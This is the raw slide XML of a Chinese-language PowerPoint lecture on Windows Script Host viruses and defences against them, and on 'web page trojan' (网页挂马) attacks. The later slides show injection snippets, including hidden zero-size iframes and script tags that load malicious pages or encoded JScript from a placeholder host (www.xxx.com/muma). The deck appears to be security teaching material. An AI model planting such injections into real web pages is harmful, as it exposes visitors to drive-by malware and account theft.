              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>regsvr32 scrrun.dll /u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT\CLSID\ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pP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卸载</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Windows Scripting Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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删除</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>VBE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>JSE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>文件后缀名与应用程序的映射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3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957580" y="2143125"/>
            <a:ext cx="9558020" cy="4094480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>目录中，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>WScript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>，更改名称或者删除</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自定义安全级别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>OutlookExpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的自动收发邮件功能</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显示扩展名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕12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39938" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743585" y="2286000"/>
            <a:ext cx="9772015" cy="3951605"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>将系统的网络连接的安全级别设置至少为“中等”，它可以在一定程度上预防某些有害的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>程序或者某些</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>组件对计算机的侵害</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安装杀毒软件</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7170" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937260" y="1857375"/>
            <a:ext cx="9578340" cy="4380230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>WSH</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Windows Scripting Host(Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>脚本宿主</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的缩略形式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>是一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>平台、并独立于语言的脚本运行环境，是一种批次语言</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>自动执行工具</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文件名为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>WScript.exe(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>若是在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>命令提示符下，则为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>CScript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>，命令格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>CScript FileName.vbs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972820" y="1857375"/>
            <a:ext cx="9542780" cy="4380230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</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在获取网站或者网站服务器的部分或者全部权限后，在网页文件中插入一段恶意代码</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这些恶意代码主要是一些包括</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>等漏洞利用代码</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用户访问被挂马的页面时，如果系统没有更新恶意代码中利用的漏洞补丁，则机会执行恶意代码程序，进行盗号等危险操作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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41986" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1857375"/>
            <a:ext cx="9677400" cy="4380230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见的网页挂马方式</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框架挂马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>&lt;iframe src=http://www.xxx.com/muma.htm width=0 height=0&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>文件挂马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>document.write("&lt;iframe width=0 height=0 src='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>'&gt;&lt;/iframe&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>&lt;script language=javascript src=xxx.js&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43010" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1825625"/>
            <a:ext cx="10637520" cy="4351655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t> js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>变形加密</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>&lt;SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="fr-FR" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
